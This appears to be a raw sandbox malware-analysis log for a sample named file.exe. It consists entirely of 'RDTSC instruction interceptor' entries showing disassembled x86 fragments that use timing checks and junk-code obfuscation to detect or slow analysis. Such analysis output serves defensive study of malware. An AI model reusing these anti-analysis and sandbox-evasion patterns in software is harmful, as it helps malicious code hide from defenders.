Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C83EA9 second address: C83EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F6398F5B496h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F6398F5B496h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C83EBC second address: C83ECC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007F6398F5ECB2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C84020 second address: C84026 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C84026 second address: C8405D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F6398F5ECAAh 0x0000000c jmp 00007F6398F5ECA4h 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F6398F5ECA3h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C8748D second address: C874B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6398F5B4A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jo 00007F6398F5B49Eh 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C874B0 second address: C874CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov eax, dword ptr [eax] 0x00000007 js 00007F6398F5EC9Eh 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C874CE second address: B11987 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F6398F5B49Ch 0x0000000c popad 0x0000000d pop eax 0x0000000e push dword ptr [ebp+122D09DDh] 0x00000014 mov edi, ebx 0x00000016 call dword ptr [ebp+122D3064h] 0x0000001c pushad 0x0000001d mov dword ptr [ebp+122D183Dh], edx 0x00000023 xor eax, eax 0x00000025 jc 00007F6398F5B49Ah 0x0000002b pushad 0x0000002c mov edx, edi 0x0000002e popad 0x0000002f mov edx, dword ptr [esp+28h] 0x00000033 pushad 0x00000034 sub dword ptr [ebp+122D183Dh], ecx 0x0000003a popad 0x0000003b stc 0x0000003c mov dword ptr [ebp+122D2CB7h], eax 0x00000042 stc 0x00000043 mov esi, 0000003Ch 0x00000048 or dword ptr [ebp+122D3120h], edx 0x0000004e add esi, dword ptr [esp+24h] 0x00000052 jng 00007F6398F5B4A2h 0x00000058 jbe 00007F6398F5B49Ch 0x0000005e jbe 00007F6398F5B496h 0x00000064 lodsw 0x00000066 mov dword ptr [ebp+122D2566h], esi 0x0000006c jmp 00007F6398F5B4A3h 0x00000071 add eax, dword ptr [esp+24h] 0x00000075 cld 0x00000076 mov ebx, dword ptr [esp+24h] 0x0000007a mov dword ptr [ebp+122D3120h], ecx 0x00000080 nop 0x00000081 jmp 00007F6398F5B4A1h 0x00000086 push eax 0x00000087 pushad 0x00000088 push eax 0x00000089 push edx 0x0000008a pushad 0x0000008b popad 0x0000008c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C87501 second address: C8750B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F6398F5EC96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C876CC second address: C876D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F6398F5B496h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C876D6 second address: C876DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C876DA second address: C8773A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b call 00007F6398F5B49Fh 0x00000010 mov si, DC23h 0x00000014 pop edx 0x00000015 push 00000000h 0x00000017 mov dword ptr [ebp+122D38C6h], ecx 0x0000001d push E25F0FD6h 0x00000022 jmp 00007F6398F5B4A0h 0x00000027 add dword ptr [esp], 1DA0F0AAh 0x0000002e je 00007F6398F5B49Ch 0x00000034 mov dword ptr [ebp+122D37C8h], edi 0x0000003a push 00000003h 0x0000003c push 00000000h 0x0000003e cld 0x0000003f push 00000003h 0x00000041 push C9DAB370h 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a popad 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C87921 second address: C87926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C87926 second address: C8792C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8792C second address: C87930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7CD88 second address: C7CDAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F6398F5B496h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6398F5B4A5h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA6458 second address: CA645E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA645E second address: CA6463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA6463 second address: CA646D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6398F5ECA2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA646D second address: CA6473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA66FC second address: CA6700 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA6700 second address: CA6704 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA6E1B second address: CA6E5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6398F5ECA0h 0x00000009 jmp 00007F6398F5EC9Fh 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F6398F5ECA7h 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA6E5F second address: CA6E6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F6398F5B496h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA6E6B second address: CA6E8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F6398F5ECA9h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA6E8B second address: CA6E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F6398F5B496h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA7F68 second address: CA7F86 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007F6398F5ECA2h 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA7F86 second address: CA7F9D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6398F5B49Eh 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA840A second address: CA840E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB0C2 second address: CAB0C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6DB74 second address: C6DB84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 jno 00007F6398F5EC96h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB3279 second address: CB327F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB327F second address: CB3283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB459E second address: CB45C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F6398F5B4A3h 0x0000000e pushad 0x0000000f jo 00007F6398F5B496h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB47AF second address: CB47B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB47B3 second address: CB47B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB47B9 second address: CB47D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6398F5ECA9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB47D6 second address: CB47DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB509E second address: CB50B1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6398F5EC96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jnc 00007F6398F5EC96h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB5289 second address: CB52A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6398F5B4A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB535B second address: CB5372 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6398F5EC9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB5372 second address: CB537B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB537B second address: CB537F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB54BB second address: CB54BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB54BF second address: CB54C9 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6398F5EC9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB59BD second address: CB59F0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F6398F5B4A2h 0x0000000f jmp 00007F6398F5B4A6h 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB59F0 second address: CB59F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB8D9F second address: CB8DA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB8DA3 second address: CB8DA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB8DA9 second address: CB8DAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB8DAF second address: CB8E0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6398F5EC9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F6398F5EC98h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 jmp 00007F6398F5EC9Fh 0x0000002d push 00000000h 0x0000002f jmp 00007F6398F5EC9Eh 0x00000034 push 00000000h 0x00000036 push eax 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b popad 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7B2D7 second address: C7B2EC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 jnl 00007F6398F5B496h 0x0000000b pop esi 0x0000000c pushad 0x0000000d jg 00007F6398F5B496h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBC0F7 second address: CBC0FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBC0FB second address: CBC0FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7E7EB second address: C7E80A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6398F5EC9Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jo 00007F6398F5EC98h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push edi 0x00000018 pop edi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC2A1F second address: CC2A8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 mov ebx, dword ptr [ebp+122D2D1Fh] 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007F6398F5B498h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a push 00000000h 0x0000002c mov bx, A490h 0x00000030 xchg eax, esi 0x00000031 jo 00007F6398F5B4ADh 0x00000037 jl 00007F6398F5B4A7h 0x0000003d jmp 00007F6398F5B4A1h 0x00000042 push eax 0x00000043 jl 00007F6398F5B4ADh 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007F6398F5B49Fh 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC3A10 second address: CC3A1A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6398F5EC9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC2CC2 second address: CC2CC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC2CC6 second address: CC2CCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC598F second address: CC5993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC4AFD second address: CC4B03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC5993 second address: CC59A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6398F5B49Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC6A14 second address: CC6A1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC5B53 second address: CC5B72 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6398F5B49Ch 0x00000008 jnp 00007F6398F5B496h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007F6398F5B49Ch 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC6A1A second address: CC6A5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F6398F5EC98h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 push 00000000h 0x00000025 mov di, 5D42h 0x00000029 mov dword ptr [ebp+12459F66h], esi 0x0000002f push 00000000h 0x00000031 mov ebx, dword ptr [ebp+122D370Eh] 0x00000037 push eax 0x00000038 pushad 0x00000039 pushad 0x0000003a jne 00007F6398F5EC96h 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC6A5E second address: CC6A67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC8910 second address: CC8984 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 mov edi, dword ptr [ebp+122D23E2h] 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007F6398F5EC98h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a cld 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push edx 0x00000030 call 00007F6398F5EC98h 0x00000035 pop edx 0x00000036 mov dword ptr [esp+04h], edx 0x0000003a add dword ptr [esp+04h], 00000017h 0x00000042 inc edx 0x00000043 push edx 0x00000044 ret 0x00000045 pop edx 0x00000046 ret 0x00000047 xchg eax, esi 0x00000048 jnl 00007F6398F5ECA2h 0x0000004e push eax 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 js 00007F6398F5EC96h 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC9923 second address: CC9927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCB739 second address: CCB73F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCD8B2 second address: CCD8B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCA99F second address: CCAA3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 mov ebx, eax 0x0000000b push dword ptr fs:[00000000h] 0x00000012 mov dword ptr [ebp+122D33A7h], esi 0x00000018 mov dword ptr fs:[00000000h], esp 0x0000001f push 00000000h 0x00000021 push ebp 0x00000022 call 00007F6398F5EC98h 0x00000027 pop ebp 0x00000028 mov dword ptr [esp+04h], ebp 0x0000002c add dword ptr [esp+04h], 0000001Ch 0x00000034 inc ebp 0x00000035 push ebp 0x00000036 ret 0x00000037 pop ebp 0x00000038 ret 0x00000039 mov eax, dword ptr [ebp+122D0741h] 0x0000003f jno 00007F6398F5ECA2h 0x00000045 push FFFFFFFFh 0x00000047 push 00000000h 0x00000049 push esi 0x0000004a call 00007F6398F5EC98h 0x0000004f pop esi 0x00000050 mov dword ptr [esp+04h], esi 0x00000054 add dword ptr [esp+04h], 00000017h 0x0000005c inc esi 0x0000005d push esi 0x0000005e ret 0x0000005f pop esi 0x00000060 ret 0x00000061 jmp 00007F6398F5ECA7h 0x00000066 sub bh, 0000001Eh 0x00000069 push eax 0x0000006a push edi 0x0000006b pushad 0x0000006c pushad 0x0000006d popad 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCB90D second address: CCB91C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6398F5B49Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCCA64 second address: CCCA69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCE83A second address: CCE8D7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ecx 0x00000008 jnp 00007F6398F5B4AAh 0x0000000e jmp 00007F6398F5B4A4h 0x00000013 pop ecx 0x00000014 nop 0x00000015 movzx ebx, si 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007F6398F5B498h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 00000014h 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 jmp 00007F6398F5B4A3h 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push edi 0x0000003e call 00007F6398F5B498h 0x00000043 pop edi 0x00000044 mov dword ptr [esp+04h], edi 0x00000048 add dword ptr [esp+04h], 00000016h 0x00000050 inc edi 0x00000051 push edi 0x00000052 ret 0x00000053 pop edi 0x00000054 ret 0x00000055 movsx edi, dx 0x00000058 call 00007F6398F5B49Ch 0x0000005d sub dword ptr [ebp+122D2648h], edx 0x00000063 pop ebx 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 jns 00007F6398F5B49Ch 0x0000006d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCDB9C second address: CCDBA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCBA07 second address: CCBA11 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6398F5B496h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCDBA0 second address: CCDBAE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6398F5EC96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCFA40 second address: CCFA4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F6398F5B496h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCDBAE second address: CCDBB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD4489 second address: CD44A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6398F5B4A7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD44A4 second address: CD44B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jnl 00007F6398F5EC96h 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0ABE second address: CD0AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
